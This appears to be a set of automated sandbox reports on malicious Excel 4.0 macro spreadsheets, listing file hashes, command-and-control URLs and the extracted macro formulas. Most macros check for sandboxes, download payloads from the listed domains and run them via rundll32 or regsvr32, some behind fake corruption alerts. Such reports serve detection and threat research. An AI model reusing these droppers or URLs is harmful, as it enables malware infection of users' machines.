{"version":"0.2","sample":{"sample":"","kind":"file","target":"559950b3153945d31eadaf333e64cdd83d7feebce3a6b3d0c36bbaec8b1caf11"},"analysis":{"reported":"2020-04-09T16:16:22Z","score":10},"files":[{"filename":"559950b3153945d31eadaf333e64cdd83d7feebce3a6b3d0c36bbaec8b1caf11","filesize":141312,"md5":"3094c6a6dbc09cf4fadf85c9466aaa33","sha1":"c64e1cc5bd2597baebba5a9fdbc7aa6f7aff08b8","sha256":"559950b3153945d31eadaf333e64cdd83d7feebce3a6b3d0c36bbaec8b1caf11","sha512":"96cbba5566c40113b0a12abeb70c6f56c7ff9675c4514b654c3c361e1011dcae81092a7386ccc73e6577baf0c495b4b259db29fe14972dc9dfbcbc77319181d6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"559950b3153945d31eadaf333e64cdd83d7feebce3a6b3d0c36bbaec8b1caf11.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/ckjbvkf732"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nRETURN()\nRETURN()\nWORKBOOK.HIDE(\"c91hDxJSgJ\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"55a666bff6618550a202f460e3dd87b57b61898dc80e24ad8d4cadd4c77b50bf"},"analysis":{"reported":"2020-04-09T16:16:22Z","score":10},"files":[{"filename":"55a666bff6618550a202f460e3dd87b57b61898dc80e24ad8d4cadd4c77b50bf","filesize":167936,"md5":"6cd47abca810a59fd007bfda7c5ef0df","sha1":"265a4709ff14fc4980234713a3610e5a3476f487","sha256":"55a666bff6618550a202f460e3dd87b57b61898dc80e24ad8d4cadd4c77b50bf","sha512":"5472d274f4463be6a53b8329597e7bf320c1ade0e7c2211a785eb18bf8a47467214db0dcc8558917fa042afae10014634d8555e76776be79ee50f0ac63481586","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"55a666bff6618550a202f460e3dd87b57b61898dc80e24ad8d4cadd4c77b50bf.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"WokeodE32r\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"55a70fe2ac526954f9d8dcd275d70d285efcfc2b9331dbe3c182d46693c39e99"},"analysis":{"reported":"2020-04-09T16:16:22Z","score":10},"files":[{"filename":"55a70fe2ac526954f9d8dcd275d70d285efcfc2b9331dbe3c182d46693c39e99","filesize":185344,"md5":"d4fe93040a8341b04851a9a28165c5df","sha1":"91a3202bc661184153e6cd2d5a4eed2e1ee0126b","sha256":"55a70fe2ac526954f9d8dcd275d70d285efcfc2b9331dbe3c182d46693c39e99","sha512":"bcc5535ff416fb0568bcf654545d42ef0c260d22e5896a0a378b44b391b7b5a45f91e50fed0c29eabf88ce70cdb2de4120501f615d164b942211d7126518e9d4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"55a70fe2ac526954f9d8dcd275d70d285efcfc2b9331dbe3c182d46693c39e99.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"55b8d7f92177633bd748ee2f6e43c2bef1907df8172e4a0049bb3bb576f6a922"},"analysis":{"reported":"2020-04-09T16:16:22Z","score":10},"files":[{"filename":"55b8d7f92177633bd748ee2f6e43c2bef1907df8172e4a0049bb3bb576f6a922","filesize":160768,"md5":"f1bbc21d1806df7c4a0d4ec4c9262a10","sha1":"e24ab983cf1e82748d67dfc253f8949980d3a5f2","sha256":"55b8d7f92177633bd748ee2f6e43c2bef1907df8172e4a0049bb3bb576f6a922","sha512":"6ba30d579f07643f5741900508b6a2f6a74bb0025e2a519b4b00280c221d1589d7cb8813a8b8c8f696bca3d123ac29630153d4b14d2e40dcb7e73373aef23ad0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"55b8d7f92177633bd748ee2f6e43c2bef1907df8172e4a0049bb3bb576f6a922.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"hPHk0CxKqP\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"55bc728a6cf333a14eaeb2c802e12b2a272bab144c2b46f3b18bb98a5a87fddd"},"analysis":{"reported":"2020-04-09T16:16:22Z","score":10},"files":[{"filename":"55bc728a6cf333a14eaeb2c802e12b2a272bab144c2b46f3b18bb98a5a87fddd","filesize":185344,"md5":"e278256000a76fefdc91a276a56355c0","sha1":"d6878c0ce4fa36bfd5402a8d73bd6e4a6c549c42","sha256":"55bc728a6cf333a14eaeb2c802e12b2a272bab144c2b46f3b18bb98a5a87fddd","sha512":"4419cf6dffb5ff8b2f452eb10c6950ac653e4a4d8c3dd9ea2a78657c2356535688495df1577c1e5903368a55ed33d1c3df84766bc5aa7675e10aaf34157081fa","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"55bc728a6cf333a14eaeb2c802e12b2a272bab144c2b46f3b18bb98a5a87fddd.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"55bedad33fc4bada3ca01012464ff3921d036ba595f4fee905ce458bfd04c9f5"},"analysis":{"reported":"2020-04-09T16:16:22Z","score":10},"files":[{"filename":"55bedad33fc4bada3ca01012464ff3921d036ba595f4fee905ce458bfd04c9f5","filesize":185344,"md5":"69119ccfb0e21126433f45118d210563","sha1":"ce93135f5c4e26196ee863d97cfdf1139b005451","sha256":"55bedad33fc4bada3ca01012464ff3921d036ba595f4fee905ce458bfd04c9f5","sha512":"66db70f3608d2607a78b2f3e1c0e51955e4b6f2c7cd3b5f87b86c3528b52ee287ccf2be5e5737e477fb071df554efdd603639af9777cab88755129092c66214b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"55bedad33fc4bada3ca01012464ff3921d036ba595f4fee905ce458bfd04c9f5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"55ddc128a5b36b8322a41ed461e5f8ce989780f9a1456071f94ebb3c4a561d3e"},"analysis":{"reported":"2020-04-09T16:16:22Z","score":10},"files":[{"filename":"55ddc128a5b36b8322a41ed461e5f8ce989780f9a1456071f94ebb3c4a561d3e","filesize":167936,"md5":"0f34dad888028487bee6d6e19a0fde92","sha1":"88b5c2f58490af747ef7853e795d58009a86e5db","sha256":"55ddc128a5b36b8322a41ed461e5f8ce989780f9a1456071f94ebb3c4a561d3e","sha512":"83806083b8a0e0e922ceded0f683a6d40aedcb6f53fef895c1b461a36dea1875e35d07220e0daeb319f577fd6438cc717d9bcfa72396b1406252172534ce8dbd","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"55ddc128a5b36b8322a41ed461e5f8ce989780f9a1456071f94ebb3c4a561d3e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"K69RvDap7k\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"55ea4c0c63e06fb48436b5698ed76a918f4a3ea2a52daa547ec5e316634c75ae"},"analysis":{"reported":"2020-04-09T16:16:22Z","score":10},"files":[{"filename":"55ea4c0c63e06fb48436b5698ed76a918f4a3ea2a52daa547ec5e316634c75ae","filesize":196096,"md5":"44a02ddc2198e2284f95edeade265dae","sha1":"a32b7ba1c696f3d1c6aed2363650439484332fce","sha256":"55ea4c0c63e06fb48436b5698ed76a918f4a3ea2a52daa547ec5e316634c75ae","sha512":"4294f0ddd5d301fe253a7879cf5e82d5661091b8a630fd9f81e0effb6db536bb15c765b7647850297e4d0da8669d763acb86397e63d327bc7863c50afa90b917","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"55ea4c0c63e06fb48436b5698ed76a918f4a3ea2a52daa547ec5e316634c75ae.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nFOPEN(\"C:\\Users\\Public\\2.vbs\",3)\nMESSAGE(TRUE,\"One moment please...\")\nIF(GET.WORKSPACE(42),EXEC(GET.NOTE(R$34C$3)),CLOSE(TRUE))\nIF(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2),EXEC(GET.NOTE(R$36C$3)),)\nCLOSE(TRUE)\nHALT()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"55ffca58340fecad4accfa64f52b91b5ad7540270dfee194617ad6763dfa507e"},"analysis":{"reported":"2020-04-09T16:16:22Z","score":10},"files":[{"filename":"55ffca58340fecad4accfa64f52b91b5ad7540270dfee194617ad6763dfa507e","filesize":160768,"md5":"991d879160505f26b1e2fa0f832a14d9","sha1":"56678f9113eeec2059c37c81c8ebb680d794260e","sha256":"55ffca58340fecad4accfa64f52b91b5ad7540270dfee194617ad6763dfa507e","sha512":"f5d92157135e8cd2eb1c74cec30f1b2dea6fcb607dddeeebb4868bc9982fa820a7a64b35c77d8daacf307f2c743e451876c0a272fb34072a55461b803786f752","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"55ffca58340fecad4accfa64f52b91b5ad7540270dfee194617ad6763dfa507e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"8j93Moq5kU\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5611f8b8b794c750539739e335a9c8ffcd9fbbd6d3568168b76d040a0e3ddfaf"},"analysis":{"reported":"2020-04-09T16:16:22Z","score":10},"files":[{"filename":"5611f8b8b794c750539739e335a9c8ffcd9fbbd6d3568168b76d040a0e3ddfaf","filesize":209920,"md5":"8a508a502286d50b6720543701a97158","sha1":"b3c2fa06921f50bb827f317c2b1f821b676ef84a","sha256":"5611f8b8b794c750539739e335a9c8ffcd9fbbd6d3568168b76d040a0e3ddfaf","sha512":"0767c5d181fb2cc142459f1c335c78c95369f960cd418db5d67f0b6ef62fdd7144088614d14d3dcfe0baac75c90d77fe0830085a28fd04b937103f5df44046a8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5611f8b8b794c750539739e335a9c8ffcd9fbbd6d3568168b76d040a0e3ddfaf.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"lHIPxfLoW6\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5617bf49a4eec12a6e3d3ba4314a8953e2f393ff4fd96a67f32aa1aa707d7b9d"},"analysis":{"reported":"2020-04-09T16:16:22Z","score":10},"files":[{"filename":"5617bf49a4eec12a6e3d3ba4314a8953e2f393ff4fd96a67f32aa1aa707d7b9d","filesize":103941,"md5":"1a93337c64172c823e5afe266d07ab41","sha1":"195dac4598abb5b796699254645083672207b122","sha256":"5617bf49a4eec12a6e3d3ba4314a8953e2f393ff4fd96a67f32aa1aa707d7b9d","sha512":"c969cd7cda92027f2c21fe3fff8ae47da17e88162f1c870bde8f47fc208e476c536efa5b1c9d8c1309665823b7d61c80f29602fd83dc5ad6c4383ae30d9a92d4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5617bf49a4eec12a6e3d3ba4314a8953e2f393ff4fd96a67f32aa1aa707d7b9d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://209.141.54.161/crypt.dl"],"attr":{"formulas":"CALL(\"Kernel32\",\"CreateDirectoryA\",\"JCJ\",\"C:\\rncwner\",0)\nCALL(\"Kernel32\",\"CreateDirectoryA\",\"JCJ\",\"C:\\rncwner\\CkkYKlI\",0)\nCALL(\"URLMON\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://209.141.54.161/crypt.dl\",\"C:\\rncwner\\CkkYKlI\\UiQhTXx.dll\",0,0)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCCJ\",0,\"Open\",\"rundll32.exe\",\"C:\\rncwner\\CkkYKlI\\UiQhTXx.dll DllRegisterServer\",0,0)\nHALT()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"561c296854a565571a1561b2f3e1f26ec6c94ef6c43b5e0b500a2b6d3574dbeb"},"analysis":{"reported":"2020-04-09T16:16:22Z","score":10},"files":[{"filename":"561c296854a565571a1561b2f3e1f26ec6c94ef6c43b5e0b500a2b6d3574dbeb","filesize":185856,"md5":"a1e275a151cc4f09a06c360818a820f7","sha1":"acc07718f15802e556f53ae5f128f98c87f935eb","sha256":"561c296854a565571a1561b2f3e1f26ec6c94ef6c43b5e0b500a2b6d3574dbeb","sha512":"c3e0cc1d33387032b22fd476e29a35f169d5147f678b1e408d104d5da5c8b7f38750e01cf1de4bad48b1924a06b9bc7d48cf7f1254236ef4a3bd88d39f0e7404","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"561c296854a565571a1561b2f3e1f26ec6c94ef6c43b5e0b500a2b6d3574dbeb.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://merystol.xyz/qY3DRY3N"],"attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://merystol.xyz/qY3DRY3N\",\"c:\\Users\\Public\\asd2ff32.html\",0,0)\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nEXEC(\"wmic process call create \"\"regsvr32 -s c:\\Users\\Public\\asd2ff32.html\"\"\")\nCLOSE(TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5634565879128e44e4d29d06ebeec5d2cc3d6369cc6501bcbe349af0d7b21b31"},"analysis":{"reported":"2020-04-09T16:16:22Z","score":10},"files":[{"filename":"5634565879128e44e4d29d06ebeec5d2cc3d6369cc6501bcbe349af0d7b21b31","filesize":116224,"md5":"899325435540c94b256269f0ed3722d3","sha1":"3810b7f4755c1f4b16e50284e6f8e7d536b40695","sha256":"5634565879128e44e4d29d06ebeec5d2cc3d6369cc6501bcbe349af0d7b21b31","sha512":"2a1c6029f80a20447acfd25ce467da87ec26c0a2cb56d05e89934073a39a50b8fb075dc5a31ab11a01a6949a5617e17d31be99cb371130708d9d37b6dce67f81","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5634565879128e44e4d29d06ebeec5d2cc3d6369cc6501bcbe349af0d7b21b31.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"RgkbqMDa6W\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5643057a70b5595f13febd06bce19e6fbf744746ab0ea1c5d78000e55f02ee0f"},"analysis":{"reported":"2020-04-09T16:16:22Z","score":10},"files":[{"filename":"5643057a70b5595f13febd06bce19e6fbf744746ab0ea1c5d78000e55f02ee0f","filesize":116224,"md5":"99fe2de9a03c619392d0f1cb48a00193","sha1":"2bfd772f712fd4f1dfd555be5b129f2c1f8cca3d","sha256":"5643057a70b5595f13febd06bce19e6fbf744746ab0ea1c5d78000e55f02ee0f","sha512":"b249821a398e9ee1daee465f66c3e22e5149eb14bdfa14cde9cc3e0b5ea5b31f58b2a9b17e5a209b38cc6f0748abec2df92c7a2b7c551a238365297d2ddd5966","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5643057a70b5595f13febd06bce19e6fbf744746ab0ea1c5d78000e55f02ee0f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"vwqwNEIX3i\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"564ea34fbced26f8e80943bbe5a2c27e088839f92a4e86cf3894c97bddcddc5c"},"analysis":{"reported":"2020-04-09T16:16:22Z","score":10},"files":[{"filename":"564ea34fbced26f8e80943bbe5a2c27e088839f92a4e86cf3894c97bddcddc5c","filesize":185344,"md5":"3cd429cf994ee48cb12b3eb712ede04a","sha1":"afa4ec9b5f503742492483615f6ce854fb95e0c0","sha256":"564ea34fbced26f8e80943bbe5a2c27e088839f92a4e86cf3894c97bddcddc5c","sha512":"1baf9892bee8abee083800f1ea0a37a08e0fe9b17ab4ed25a923e3c832f0331d67722d57f4e2bd3614eeeba61b27b1b3fc2c6b67f6dd8437c2067020538cf25f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"564ea34fbced26f8e80943bbe5a2c27e088839f92a4e86cf3894c97bddcddc5c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"565090a5d684f79a970c1d3dec6c1dbba4a51b06200f5206b68c345b1af9f7c1"},"analysis":{"reported":"2020-04-09T16:16:22Z","score":10},"files":[{"filename":"565090a5d684f79a970c1d3dec6c1dbba4a51b06200f5206b68c345b1af9f7c1","filesize":152576,"md5":"46eb73be37ebd9c703c723a17b48ae3c","sha1":"fb101b09914c73b65a7788125bbd1a0a6a5abd15","sha256":"565090a5d684f79a970c1d3dec6c1dbba4a51b06200f5206b68c345b1af9f7c1","sha512":"75cf1b7753cab3e98f74ac53608dc2d52d0414f93e16af87be9a2af8d9abe89c831a76b84c71aad7c59e745845f6925cba1883578bf37a8cd1209df8b564e697","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"565090a5d684f79a970c1d3dec6c1dbba4a51b06200f5206b68c345b1af9f7c1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"JJDsHp6dAi\",TRUE)\nGOTO(R$1C$10)"}}}]}
